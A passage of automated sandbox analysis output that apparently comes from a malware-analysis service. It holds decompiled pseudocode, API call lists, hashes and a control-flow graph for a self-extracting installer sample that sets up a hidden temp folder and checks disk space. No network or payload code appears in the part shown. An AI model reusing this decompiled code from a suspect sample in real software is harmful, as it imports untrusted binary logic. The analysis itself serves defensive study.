                                                                                                                                                                                                        						_t35 =  *0xde8b3e; // 0x0
                                                                                                                                                                                                        						__eflags = _t35;
                                                                                                                                                                                                        						if(_t35 == 0) {
                                                                                                                                                                                                        							__eflags =  *0xde8a24; // 0x0
                                                                                                                                                                                                        							if(__eflags != 0) {
                                                                                                                                                                                                        								L46:
                                                                                                                                                                                                        								_t101 = 0x7d2;
                                                                                                                                                                                                        								_t36 = E00DE6517(_t82, 0x7d2, 0, E00DE3210, 0, 0);
                                                                                                                                                                                                        								asm("sbb eax, eax");
                                                                                                                                                                                                        								_t38 =  ~( ~_t36);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								__eflags =  *0xde9a30; // 0x0
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									goto L46;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t109 = 0xde91e4;
                                                                                                                                                                                                        									_t40 = GetTempPathA(0x104, 0xde91e4);
                                                                                                                                                                                                        									__eflags = _t40;
                                                                                                                                                                                                        									if(_t40 == 0) {
                                                                                                                                                                                                        										L19:
                                                                                                                                                                                                        										_push(_t82);
                                                                                                                                                                                                        										E00DE1781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                        										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                        										if(_v268 <= 0x5a) {
                                                                                                                                                                                                        											do {
                                                                                                                                                                                                        												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                        												__eflags = _t109 - 6;
                                                                                                                                                                                                        												if(_t109 == 6) {
                                                                                                                                                                                                        													L22:
                                                                                                                                                                                                        													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                        													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                        														goto L30;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L23;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													__eflags = _t109 - 3;
                                                                                                                                                                                                        													if(_t109 != 3) {
                                                                                                                                                                                                        														L23:
                                                                                                                                                                                                        														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00DE6952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E00DE597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00DE2630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E00DE658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0xde91e4;
																					E00DE1781(0xde91e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00DE5467(0xde91e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00DE2630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E00DE597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00DE5467(0xde91e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0xde91e4;
											_t70 = E00DE2630(0, 0xde91e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0xde91e4;
												_t71 = E00DE5467(0xde91e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E00DE597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0xde8b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00DE5467(0xde8b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E00DE44B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                        								goto L2;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t101 = 0x4b1;
                                                                                                                                                                                                        						E00DE44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						LocalFree(_t109);
                                                                                                                                                                                                        						 *0xde9124 = 0x80070714;
                                                                                                                                                                                                        						goto L2;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t101 = 0x4b5;
                                                                                                                                                                                                        					E00DE44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					 *0xde9124 = E00DE6285();
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					_t38 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L47:
                                                                                                                                                                                                        				return E00DE6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                        			}





































                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de57b0
                                                                                                                                                                                                        0x00de579e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5769
                                                                                                                                                                                                        0x00de5762
                                                                                                                                                                                                        0x00de5753
                                                                                                                                                                                                        0x00de574f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de572e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5864
                                                                                                                                                                                                        0x00de5864
                                                                                                                                                                                                        0x00de5864
                                                                                                                                                                                                        0x00de5717
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de56c3
                                                                                                                                                                                                        0x00de56c5
                                                                                                                                                                                                        0x00de56c9
                                                                                                                                                                                                        0x00de56ce
                                                                                                                                                                                                        0x00de56d0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de56d6
                                                                                                                                                                                                        0x00de56d6
                                                                                                                                                                                                        0x00de56d8
                                                                                                                                                                                                        0x00de56dd
                                                                                                                                                                                                        0x00de56df
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de56e1
                                                                                                                                                                                                        0x00de56e2
                                                                                                                                                                                                        0x00de56e4
                                                                                                                                                                                                        0x00de56e6
                                                                                                                                                                                                        0x00de56eb
                                                                                                                                                                                                        0x00de56ed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de56f3
                                                                                                                                                                                                        0x00de56f3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de586c
                                                                                                                                                                                                        0x00de5878
                                                                                                                                                                                                        0x00de587e
                                                                                                                                                                                                        0x00de5882
                                                                                                                                                                                                        0x00de5883
                                                                                                                                                                                                        0x00de5889
                                                                                                                                                                                                        0x00de588e
                                                                                                                                                                                                        0x00de588e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5896
                                                                                                                                                                                                        0x00de56ed
                                                                                                                                                                                                        0x00de56df
                                                                                                                                                                                                        0x00de56d0
                                                                                                                                                                                                        0x00de56c1
                                                                                                                                                                                                        0x00de56a8
                                                                                                                                                                                                        0x00de565b
                                                                                                                                                                                                        0x00de565b
                                                                                                                                                                                                        0x00de565d
                                                                                                                                                                                                        0x00de5669
                                                                                                                                                                                                        0x00de5669
                                                                                                                                                                                                        0x00de565f
                                                                                                                                                                                                        0x00de565f
                                                                                                                                                                                                        0x00de5665
                                                                                                                                                                                                        0x00de5667
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5667
                                                                                                                                                                                                        0x00de566c
                                                                                                                                                                                                        0x00de5673
                                                                                                                                                                                                        0x00de5678
                                                                                                                                                                                                        0x00de567a
                                                                                                                                                                                                        0x00de589b
                                                                                                                                                                                                        0x00de589b
                                                                                                                                                                                                        0x00de5680
                                                                                                                                                                                                        0x00de5685
                                                                                                                                                                                                        0x00de568c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de568c
                                                                                                                                                                                                        0x00de567a
                                                                                                                                                                                                        0x00de560e
                                                                                                                                                                                                        0x00de5613
                                                                                                                                                                                                        0x00de561a
                                                                                                                                                                                                        0x00de5620
                                                                                                                                                                                                        0x00de5626
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5626
                                                                                                                                                                                                        0x00de55db
                                                                                                                                                                                                        0x00de55e0
                                                                                                                                                                                                        0x00de55e7
                                                                                                                                                                                                        0x00de55f1
                                                                                                                                                                                                        0x00de55f6
                                                                                                                                                                                                        0x00de55f6
                                                                                                                                                                                                        0x00de55f6
                                                                                                                                                                                                        0x00de58b7
                                                                                                                                                                                                        0x00de58c7

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46A0
                                                                                                                                                                                                          • Part of subcall function 00DE468F: SizeofResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46A9
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46C3
                                                                                                                                                                                                          • Part of subcall function 00DE468F: LoadResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46CC
                                                                                                                                                                                                          • Part of subcall function 00DE468F: LockResource.KERNEL32(00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46D3
                                                                                                                                                                                                          • Part of subcall function 00DE468F: memcpy_s.MSVCRT ref: 00DE46E5
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00DE55CF
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00DE5638
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00DE564C
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00DE5620
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DE4518
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00DE4554
                                                                                                                                                                                                          • Part of subcall function 00DE6285: GetLastError.KERNEL32(00DE5BBC), ref: 00DE6285
                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00DE56B9
                                                                                                                                                                                                        • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00DE571E
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00DE5737
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00DE57CD
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00DE57EF
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00DE5802
                                                                                                                                                                                                          • Part of subcall function 00DE2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00DE2654
                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00DE5830
                                                                                                                                                                                                          • Part of subcall function 00DE6517: FindResourceA.KERNEL32(00DE0000,000007D6,00000005), ref: 00DE652A
                                                                                                                                                                                                          • Part of subcall function 00DE6517: LoadResource.KERNEL32(00DE0000,00000000,?,?,00DE2EE8,00000000,00DE19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00DE6538
                                                                                                                                                                                                          • Part of subcall function 00DE6517: DialogBoxIndirectParamA.USER32(00DE0000,00000000,00000547,00DE19E0,00000000), ref: 00DE6557
                                                                                                                                                                                                          • Part of subcall function 00DE6517: FreeResource.KERNEL32(00000000,?,?,00DE2EE8,00000000,00DE19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00DE6560
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00DE5878
                                                                                                                                                                                                          • Part of subcall function 00DE597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00DE59A8
                                                                                                                                                                                                          • Part of subcall function 00DE597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00DE59AF
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                        • API String ID: 2436801531-1782941137
                                                                                                                                                                                                        • Opcode ID: c4c41d64a6379b1ae85dd25762fb3666d3c24572644bb260043fcf7a30f335fc
                                                                                                                                                                                                        • Instruction ID: d4ff2c5eb2be8b399e8350452c8189a97cad69842bb0e5b3ed364efb52eeed15
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c4c41d64a6379b1ae85dd25762fb3666d3c24572644bb260043fcf7a30f335fc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2811C70A04BC55ADB20BB37ACC5BEE765D9B61388F440065F58AD6299DFB0CEC18A70
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        control_flow_graph 324 de597d-de59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 de59dd-de5a1b GetDiskFreeSpaceA 324->325 326 de59bb-de59d8 call de44b9 call de6285 324->326 328 de5ba1-de5bde memset call de6285 GetLastError FormatMessageA 325->328 329 de5a21-de5a4a MulDiv 325->329 345 de5c05-de5c14 call de6ce0 326->345 337 de5be3-de5bfc call de44b9 SetCurrentDirectoryA 328->337 329->328 332 de5a50-de5a6c GetVolumeInformationA 329->332 335 de5a6e-de5ab0 memset call de6285 GetLastError FormatMessageA 332->335 336 de5ab5-de5aca SetCurrentDirectoryA 332->336 335->337 339 de5acc-de5ad1 336->339 351 de5c02 337->351 343 de5ae2-de5ae4 339->343 344 de5ad3-de5ad8 339->344 349 de5ae6 343->349 350 de5ae7-de5af8 343->350 344->343 347 de5ada-de5ae0 344->347 347->339 347->343 349->350 353 de5af9-de5afb 350->353 354 de5c04 351->354 355 de5afd-de5b03 353->355 356 de5b05-de5b08 353->356 354->345 355->353 355->356 357 de5b0a-de5b1b call de44b9 356->357 358 de5b20-de5b27 356->358 357->351 359 de5b29-de5b33 358->359 360 de5b52-de5b5b 358->360 359->360 362 de5b35-de5b50 359->362 363 de5b62-de5b6d 360->363 362->363 365 de5b6f-de5b74 363->365 366 de5b76-de5b7d 363->366 367 de5b85 365->367 368 de5b7f-de5b81 366->368 369 de5b83 366->369 370 de5b96-de5b9f 367->370 371 de5b87-de5b94 call de268b 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                                                        			E00DE597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v788;
                                                                                                                                                                                                        				long _v792;
                                                                                                                                                                                                        				long _v796;
                                                                                                                                                                                                        				long _v800;
                                                                                                                                                                                                        				signed int _v804;
                                                                                                                                                                                                        				long _v808;
                                                                                                                                                                                                        				int _v812;
                                                                                                                                                                                                        				long _v816;
                                                                                                                                                                                                        				long _v820;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				signed int _t55;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				int _t69;
                                                                                                                                                                                                        				signed int _t73;
                                                                                                                                                                                                        				signed short _t78;
                                                                                                                                                                                                        				signed int _t87;
                                                                                                                                                                                                        				signed int _t101;
                                                                                                                                                                                                        				int _t102;
                                                                                                                                                                                                        				unsigned int _t103;
                                                                                                                                                                                                        				unsigned int _t105;
                                                                                                                                                                                                        				signed int _t111;
                                                                                                                                                                                                        				long _t112;
                                                                                                                                                                                                        				signed int _t116;
                                                                                                                                                                                                        				CHAR* _t118;
                                                                                                                                                                                                        				signed int _t119;
                                                                                                                                                                                                        				signed int _t120;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t114 = __edi;
                                                                                                                                                                                                        				_t46 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                        				_v804 = __edx;
                                                                                                                                                                                                        				_t118 = __ecx;
                                                                                                                                                                                                        				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                        				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                        				if(_t50 != 0) {
                                                                                                                                                                                                        					_push(__edi);
                                                                                                                                                                                                        					_v796 = 0;
                                                                                                                                                                                                        					_v792 = 0;
                                                                                                                                                                                                        					_v800 = 0;
                                                                                                                                                                                                        					_v808 = 0;
                                                                                                                                                                                                        					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                        					__eflags = _t55;
                                                                                                                                                                                                        					if(_t55 == 0) {
                                                                                                                                                                                                        						L29:
                                                                                                                                                                                                        						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                        						 *0xde9124 = E00DE6285();
                                                                                                                                                                                                        						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                        						_t110 = 0x4b0;
                                                                                                                                                                                                        						L30:
                                                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                                                        						E00DE44B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                        						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                        						L31:
                                                                                                                                                                                                        						_t66 = 0;
                                                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                                                        						L32:
                                                                                                                                                                                                        						_pop(_t114);
                                                                                                                                                                                                        						goto L33;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t69 = _v792 * _v796;
                                                                                                                                                                                                        					_v812 = _t69;
                                                                                                                                                                                                        					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                        					__eflags = _t116;
                                                                                                                                                                                                        					if(_t116 == 0) {
                                                                                                                                                                                                        						goto L29;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                        					__eflags = _t73;
                                                                                                                                                                                                        					if(_t73 != 0) {
                                                                                                                                                                                                        						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                        						_t101 =  &_v16;
                                                                                                                                                                                                        						_t111 = 6;
                                                                                                                                                                                                        						_t119 = _t118 - _t101;
                                                                                                                                                                                                        						__eflags = _t119;
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                        							__eflags = _t22;
                                                                                                                                                                                                        							if(_t22 == 0) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                        							__eflags = _t87;
                                                                                                                                                                                                        							if(_t87 == 0) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *_t101 = _t87;
                                                                                                                                                                                                        							_t101 = _t101 + 1;
                                                                                                                                                                                                        							_t111 = _t111 - 1;
                                                                                                                                                                                                        							__eflags = _t111;
                                                                                                                                                                                                        							if(_t111 != 0) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t111;
                                                                                                                                                                                                        						if(_t111 == 0) {
                                                                                                                                                                                                        							_t101 = _t101 - 1;
                                                                                                                                                                                                        							__eflags = _t101;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *_t101 = 0;
                                                                                                                                                                                                        						_t112 = 0x200;
                                                                                                                                                                                                        						_t102 = _v812;
                                                                                                                                                                                                        						_t78 = 0;
                                                                                                                                                                                                        						_t118 = 8;
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							__eflags = _t102 - _t112;
                                                                                                                                                                                                        							if(_t102 == _t112) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t112 = _t112 + _t112;
                                                                                                                                                                                                        							_t78 = _t78 + 1;
                                                                                                                                                                                                        							__eflags = _t78 - _t118;
                                                                                                                                                                                                        							if(_t78 < _t118) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t78 - _t118;
                                                                                                                                                                                                        						if(_t78 != _t118) {
                                                                                                                                                                                                        							__eflags =  *0xde9a34 & 0x00000008;
                                                                                                                                                                                                        							if(( *0xde9a34 & 0x00000008) == 0) {
                                                                                                                                                                                                        								L20:
                                                                                                                                                                                                        								_t103 =  *0xde9a38; // 0x0
                                                                                                                                                                                                        								_t110 =  *((intOrPtr*)(0xde89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                        								L21:
                                                                                                                                                                                                        								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                        								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                        									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                        									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                        										__eflags = _t103 - _t116;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										__eflags = _t110 - _t116;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								if(__eflags <= 0) {
                                                                                                                                                                                                        									 *0xde9124 = 0;
                                                                                                                                                                                                        									_t66 = 1;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t66 = E00DE268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                        							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t105 =  *0xde9a38; // 0x0
                                                                                                                                                                                                        							_t110 =  *((intOrPtr*)(0xde89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xde89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                        							_t103 = (_t105 >> 2) +  *0xde9a38;
                                                                                                                                                                                                        							goto L21;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t110 = 0x4c5;
                                                                                                                                                                                                        						E00DE44B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						goto L31;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                        					 *0xde9124 = E00DE6285();
                                                                                                                                                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                        					_t110 = 0x4f9;
                                                                                                                                                                                                        					goto L30;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t110 = 0x4bc;
                                                                                                                                                                                                        					E00DE44B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					 *0xde9124 = E00DE6285();
                                                                                                                                                                                                        					_t66 = 0;
                                                                                                                                                                                                        					L33:
                                                                                                                                                                                                        					return E00DE6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}
                                                                                                                                                                                                        0x00de5b03
                                                                                                                                                                                                        0x00de5b05
                                                                                                                                                                                                        0x00de5b08
                                                                                                                                                                                                        0x00de5b20
                                                                                                                                                                                                        0x00de5b27
                                                                                                                                                                                                        0x00de5b52
                                                                                                                                                                                                        0x00de5b52
                                                                                                                                                                                                        0x00de5b5b
                                                                                                                                                                                                        0x00de5b62
                                                                                                                                                                                                        0x00de5b6b
                                                                                                                                                                                                        0x00de5b6d
                                                                                                                                                                                                        0x00de5b76
                                                                                                                                                                                                        0x00de5b7d
                                                                                                                                                                                                        0x00de5b83
                                                                                                                                                                                                        0x00de5b7f
                                                                                                                                                                                                        0x00de5b7f
                                                                                                                                                                                                        0x00de5b7f
                                                                                                                                                                                                        0x00de5b6f
                                                                                                                                                                                                        0x00de5b72
                                                                                                                                                                                                        0x00de5b72
                                                                                                                                                                                                        0x00de5b85
                                                                                                                                                                                                        0x00de5b98
                                                                                                                                                                                                        0x00de5b9e
                                                                                                                                                                                                        0x00de5b87
                                                                                                                                                                                                        0x00de5b8f
                                                                                                                                                                                                        0x00de5b8f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5b85
                                                                                                                                                                                                        0x00de5b29
                                                                                                                                                                                                        0x00de5b33
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5b35
                                                                                                                                                                                                        0x00de5b48
                                                                                                                                                                                                        0x00de5b4a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5b4a
                                                                                                                                                                                                        0x00de5b0f
                                                                                                                                                                                                        0x00de5b16
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5b16
                                                                                                                                                                                                        0x00de5a7c
                                                                                                                                                                                                        0x00de5a8a
                                                                                                                                                                                                        0x00de5aa5
                                                                                                                                                                                                        0x00de5aab
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de59bb
                                                                                                                                                                                                        0x00de59c0
                                                                                                                                                                                                        0x00de59c7
                                                                                                                                                                                                        0x00de59d1
                                                                                                                                                                                                        0x00de59d6
                                                                                                                                                                                                        0x00de5c05
                                                                                                                                                                                                        0x00de5c14
